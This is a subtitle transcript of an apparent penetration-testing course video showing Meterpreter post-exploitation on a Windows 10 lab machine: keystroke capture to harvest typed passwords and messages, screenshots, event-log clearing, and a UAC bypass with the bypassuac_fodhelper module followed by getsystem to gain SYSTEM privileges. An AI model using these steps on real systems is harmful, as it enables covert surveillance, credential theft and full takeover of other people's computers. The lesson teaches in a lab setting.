1
00:00:00,210 --> 00:00:02,090
Hello everybody and welcome back.

2
00:00:02,200 --> 00:00:05,040
And now let's check the part two of the commands

3
00:00:05,070 --> 00:00:07,380
that we can run with the meterpreter shell.

4
00:00:07,650 --> 00:00:16,800
So let me just start up my exploit once again. So my listener -j -z, and then I execute the program,

5
00:00:18,330 --> 00:00:20,640
and we get the meterpreter session opened.

6
00:00:20,640 --> 00:00:23,130
So sessions, this is all standard.

7
00:00:23,190 --> 00:00:25,340
We already covered how to enter the session.

8
00:00:25,340 --> 00:00:28,890
So, here we are in the meterpreter session.

9
00:00:28,920 --> 00:00:33,600
Now there are a few commands that we can use in order to interact with the system itself.

10
00:00:33,600 --> 00:00:40,610
So, for example, this command is very useful if you're, for example, attacking a lower or an older Windows

11
00:00:40,610 --> 00:00:41,490
system.

12
00:00:41,490 --> 00:00:46,380
What this does is, as it says right here, attempts to elevate your privileges to that of a local

13
00:00:46,380 --> 00:00:47,310
system.

14
00:00:47,310 --> 00:00:52,970
Now system privileges on Windows are the same as the root privileges on Linux.

15
00:00:53,040 --> 00:00:59,700
What that means, basically, is that once you actually get the system privileges you can say that

16
00:00:59,700 --> 00:01:07,380
you fully exploited the machine. As a user your commands, and your basically usage of all the other programs,

17
00:01:07,470 --> 00:01:08,970
is limited.

18
00:01:08,970 --> 00:01:12,180
So in order to do that you just type here getsystem.

19
00:01:12,570 --> 00:01:18,300
But this is a Windows 10 machine, the privilege escalation won't really work here.

20
00:01:18,300 --> 00:01:23,010
Now there is another way to do the privilege escalation which I will show you just in a second,

21
00:01:23,010 --> 00:01:25,230
after we cover these other commands.

22
00:01:25,290 --> 00:01:32,370
So there are some commands such as play audio file on target system, not

23
00:01:32,420 --> 00:01:36,120
written on this, which is not really that important to us at the moment.

24
00:01:36,120 --> 00:01:43,470
What is important for us is, for example, the keylogger. If you just type here the command keyscan_start

25
00:01:43,470 --> 00:01:44,150
keyscan_start

26
00:01:44,190 --> 00:01:45,850
So let's just do that,

27
00:01:45,870 --> 00:01:49,630
keyscan_start.

28
00:01:49,950 --> 00:01:55,230
It will say right here, starting the keystroke sniffer. And it will record all of the keystrokes that

29
00:01:55,230 --> 00:01:58,260
the target enters in it's machine, or in it's keyboard.

30
00:01:58,290 --> 00:02:01,110
So, for example, let me just open notepad right here.

31
00:02:03,950 --> 00:02:10,530
And if I just start typing anything in the notepad, for example, hello world, and something like that,

32
00:02:11,430 --> 00:02:14,930
it will get written to our keylogger.

33
00:02:14,940 --> 00:02:20,530
So in order for us to print out what the target has typed in its keyboard, we can just type

34
00:02:20,640 --> 00:02:25,380
keyscan_dump. And it as you can see right here,

35
00:02:25,410 --> 00:02:27,870
this is the notepad which I typed in the search bar.

36
00:02:28,290 --> 00:02:33,680
So it captured that and it also captured the hello world, as we can see right here.

37
00:02:33,690 --> 00:02:36,150
This shift is referring to the capital letter.

38
00:02:36,150 --> 00:02:37,530
That's why it starts right here.

39
00:02:37,890 --> 00:02:42,920
So this is useful, for example, if you wanted to capture the password once the user logs in to any

40
00:02:42,940 --> 00:02:48,480
website. Unlike the man in the middle attack where you can only target HTTP websites

41
00:02:48,480 --> 00:02:50,940
and some HTTPS websites,

42
00:02:51,060 --> 00:02:56,700
this will work on any website. Or, basically, anything that the target types, since this is a keylogger

43
00:02:56,700 --> 00:02:59,620
installed on their local machine.

44
00:02:59,640 --> 00:03:05,430
This will capture even if they type it on Facebook or even if they type messages in messengers. So you

45
00:03:05,430 --> 00:03:09,600
can just capture anything basically with this. In order for you to stop

46
00:03:09,600 --> 00:03:13,850
the keylogger, once you actually want to end it, you can just type here

47
00:03:13,860 --> 00:03:18,940
keyscan_stop. And this will stop the keystroke sniffer.

48
00:03:18,990 --> 00:03:24,900
So, once you type the keyscan dump it will no longer print the output of the target's keyboard usage.

49
00:03:24,900 --> 00:03:32,730
So, basically, what I usually do is I always at the start time turn on the keyscan so

50
00:03:32,730 --> 00:03:37,470
I can capture everything that the target types. And then at the end, when I want to exit the session, I

51
00:03:37,470 --> 00:03:43,140
just basically just dump the keystrokes and close the keylogger.

52
00:03:43,140 --> 00:03:45,540
So that is a really useful thing to have.

53
00:03:45,540 --> 00:03:46,990
It is installed in meterpreter so

54
00:03:46,990 --> 00:03:52,710
you can just type it with one simple command, and the keylogger will start. Now

55
00:03:52,710 --> 00:03:59,410
I would show you these commands as well such as webcam chat, webcam snap, but my Windows machine doesn't

56
00:03:59,410 --> 00:04:01,870
really have a webcam so I won't be able to do that.

57
00:04:02,260 --> 00:04:06,580
What I can show you is, for example, this screenshot right here.

58
00:04:06,580 --> 00:04:10,860
This will grab a screenshot of the interactive desktop, which can also be useful.

59
00:04:10,880 --> 00:04:17,050
So let me just lower this so you can see. If I just type here in the terminal, or in the meterpreter

60
00:04:17,080 --> 00:04:23,110
terminal, screenshot, you will see that it will say screenshots saved to root, and then some random name

61
00:04:23,110 --> 00:04:24,100
.jpeg.

62
00:04:24,280 --> 00:04:28,870
Now the screenshot will basically be this screen that you are watching right now. So let us check it

63
00:04:28,870 --> 00:04:29,410
out.

64
00:04:29,530 --> 00:04:36,070
If we go right here and we lower the screen. Now we know that it is saved in root

65
00:04:36,080 --> 00:04:38,750
so we go to places and then computer.

66
00:04:45,400 --> 00:04:45,990
OK.

67
00:04:46,010 --> 00:04:52,430
So, we go down, scroll to the root, and right here and we can see the screenshot really did save right

68
00:04:52,430 --> 00:04:53,090
here.

69
00:04:53,120 --> 00:04:55,600
So this is also a useful thing to have.

70
00:04:56,270 --> 00:04:57,470
Now since we don't need it

71
00:04:57,470 --> 00:05:05,870
I will delete it now. Let me open in terminal. So open in terminal, and remove this.

72
00:05:05,950 --> 00:05:06,810
OK,

73
00:05:06,880 --> 00:05:07,380
good.

74
00:05:08,370 --> 00:05:12,540
Now, let's see if there is anything potentially interesting to us as well.

75
00:05:15,960 --> 00:05:17,700
So, for example...

76
00:05:18,200 --> 00:05:23,220
yeah, some of these commands you actually need administrative privileges to run. For example, the clearev,

77
00:05:23,220 --> 00:05:30,690
clear event log. You would need to actually have the system privileges in order to perform

78
00:05:30,690 --> 00:05:31,320
that.

79
00:05:31,350 --> 00:05:37,000
So, let's actually see how we can get the system privileges on the Windows 10 machine.

80
00:05:37,230 --> 00:05:44,550
Now, first of all, in the Windows XP, for example, and maybe Windows 7. I'm not really sure about that.

81
00:05:45,180 --> 00:05:47,010
I'm not really sure about Windows 7.

82
00:05:47,160 --> 00:05:51,710
The getsystem command will work on Windows XP for sure.

83
00:05:51,750 --> 00:05:55,250
So just type in this command and you will be able to get the system privileges.

84
00:05:55,380 --> 00:05:58,590
But as we can see, that doesn't really work for us.

85
00:05:58,620 --> 00:06:03,660
So what we want to do is background this session right here.

86
00:06:05,430 --> 00:06:13,070
And the next thing you want to do is basically just search for the bypass module. So the bypass module,

87
00:06:13,070 --> 00:06:22,700
you just type here search bypassuac, and uac is basically User Account Control. And you will

88
00:06:22,700 --> 00:06:27,830
see there is a few different modules that are used in order to bypass the User Account Control, which

89
00:06:27,830 --> 00:06:33,100
will give us, hopefully, the system privileges on the target machine.

90
00:06:33,110 --> 00:06:37,250
Now if you use the simple one which is the first one, so you use this one.

91
00:06:39,110 --> 00:06:40,010
Let us use it.

92
00:06:40,100 --> 00:06:46,290
So use exploit/windows/local/bypassuac and we show our options on it.

93
00:06:46,490 --> 00:06:51,740
You will see that it doesn't really work on Windows 10. If I set here, or let me show targets

94
00:06:51,740 --> 00:06:54,800
first so we can see the available targets.

95
00:06:54,890 --> 00:07:01,790
It says right here that it both works on Windows 32 bit and both on Windows 64 bit, but it really doesn't.

96
00:07:01,790 --> 00:07:07,640
So let's see if we specify right here the session, which is the only thing that it actually asks from us.

97
00:07:07,640 --> 00:07:11,140
So we check the session ID with the sessions command.

98
00:07:11,240 --> 00:07:15,890
We can see that our session ID is 2, and we set session to

99
00:07:16,880 --> 00:07:22,770
2. And if show options once again, we can see that everything is correct. And if I just type here

100
00:07:22,770 --> 00:07:30,210
exploit, this won't really work since our target or Windows 10 isn't really vulnerable to this attack.

101
00:07:30,780 --> 00:07:33,500
As we can see, exploit aborted due to failure.

102
00:07:33,510 --> 00:07:34,320
Not vulnerable.

103
00:07:34,320 --> 00:07:36,990
Windows 10 is not vulnerable.

104
00:07:36,990 --> 00:07:38,400
So, what else can we do?

105
00:07:38,400 --> 00:07:40,290
If we search bypass once again.

106
00:07:40,290 --> 00:07:42,540
So let me just find the command.

107
00:07:42,690 --> 00:07:47,310
So here it is. This one will work.

108
00:07:47,370 --> 00:07:50,760
I've checked all of these and the one that works the most,

109
00:07:50,880 --> 00:07:56,000
basically, this one also works sometimes. But, sometimes it just decides not to work.

110
00:07:56,040 --> 00:08:02,280
This one works in most of the cases. So, exploit/windows/local/bypassuac_fodhelper

111
00:08:02,550 --> 00:08:04,470
Windows UAC protection bypass.

112
00:08:04,500 --> 00:08:05,630
So it

113
00:08:05,640 --> 00:08:15,390
came out in 2017 and it is ranked as excellent. So, if you just copy this, and use, paste it here,

114
00:08:16,310 --> 00:08:17,400
and we can see that,

115
00:08:17,520 --> 00:08:22,560
basically, I believe it is the same options as in the previous one. So the only thing we need to set is the

116
00:08:22,620 --> 00:08:23,420
session.

117
00:08:23,610 --> 00:08:28,490
So we set the session to 2 since that is the session that we are running on our target.

118
00:08:28,510 --> 00:08:32,890
Windows 10 machine. And after that you just click here exploit.

119
00:08:32,890 --> 00:08:37,680
Now the only thing that will happen with this is I believe a power shell window will pop up for a brief

120
00:08:37,680 --> 00:08:45,210
second, and then it should close. Once it closes it will open a system meterpreter shell. As we can see,

121
00:08:45,390 --> 00:08:46,180
sometimes, yeah,

122
00:08:46,200 --> 00:08:51,540
sometimes this happens as well. So it basically just says exploit was completed but no session was created.

123
00:08:51,600 --> 00:08:56,610
So what you want to do when it actually completes the exploit but the session isn't really created, and

124
00:08:56,640 --> 00:08:57,930
you didn't get the meterpreter shell,

125
00:08:57,930 --> 00:09:00,540
you want to run this command until you actually get it.

126
00:09:01,020 --> 00:09:05,320
So from a few times you will be able to get the meterpreter shell.

127
00:09:05,640 --> 00:09:11,730
So we ran this a second time and, as we can see, we were able to receive the meterpreter shell.

128
00:09:11,730 --> 00:09:13,550
There are some of the things that it did.

129
00:09:13,560 --> 00:09:19,500
So as we can see, started reverse TCP handler, UAC is enabled, checking level, part of administration group,

130
00:09:19,500 --> 00:09:23,140
continuing, and it basically gives us a meterpreter shell.

131
00:09:23,250 --> 00:09:29,900
So, if we background is right now, and I clear our screen a little bit, and show my available sessions,

132
00:09:29,910 --> 00:09:33,870
you will see that right now we have two sessions available.

133
00:09:33,870 --> 00:09:38,100
The 2 is the one that we run with our shell.exe file right here.

134
00:09:38,130 --> 00:09:40,970
Let me just close this hello world since we need it.

135
00:09:40,980 --> 00:09:47,530
This is the 2 session under ID 2, and the session number ID 3 is the one that we got with the

136
00:09:47,720 --> 00:09:54,750
bypass FOD helper, which we used in order to elevate our privileges. But if you notice right here, we

137
00:09:54,750 --> 00:10:00,960
are still not the administrator, or the system privilege account, on the target PC. We are still this

138
00:10:00,960 --> 00:10:01,810
account right here.

139
00:10:02,520 --> 00:10:10,770
So, what you want to do is enter the third session, which is the one that we got with the bypass.

140
00:10:11,220 --> 00:10:15,700
And right now if you just type here getsystem, the command will simply work,

141
00:10:15,930 --> 00:10:22,560
since we were able to bypass the user account control or the UAC. As we can see right here, if I just

142
00:10:22,560 --> 00:10:25,250
type here getuid, which will print out who I am,

143
00:10:25,260 --> 00:10:31,440
it will say I am authority or system, which is the highest level of privileges you can have on a Windows

144
00:10:31,440 --> 00:10:31,970
PC.

145
00:10:32,460 --> 00:10:37,520
And by this it means that we fully and successfully exploited the Windows 10 machine.

146
00:10:37,530 --> 00:10:42,000
Right now you can do anything you want to it. You can change even important files, you can crash Windows,

147
00:10:42,000 --> 00:10:48,350
you can download/upload, you can basically do anything as well as in the root privileges in Linux.

148
00:10:48,360 --> 00:10:54,450
So if I background, and now type your sessions once again, you will see that one of them is simple user

149
00:10:54,450 --> 00:10:57,140
account and the other one is system authority.

150
00:10:58,170 --> 00:11:01,520
So, in the next video I will show you how

151
00:11:01,520 --> 00:11:07,770
you can actually...if you're running a Windows 10 machine, for example if that's your main host, how you

152
00:11:07,770 --> 00:11:09,930
can prevent yourself from this attack.

153
00:11:09,930 --> 00:11:16,800
You can prevent anyone from actually bypassing this with FOD helper, and actually gaining the system

154
00:11:16,800 --> 00:11:18,250
privileges to your PC.

155
00:11:19,080 --> 00:11:24,040
So that would be about it for this tutorial of privilege escalation and some of the basic commands in

156
00:11:24,040 --> 00:11:27,670
my interpreter, and I hope I see you in the next one and take care.

157
00:11:27,820 --> 00:11:28,320
Bye!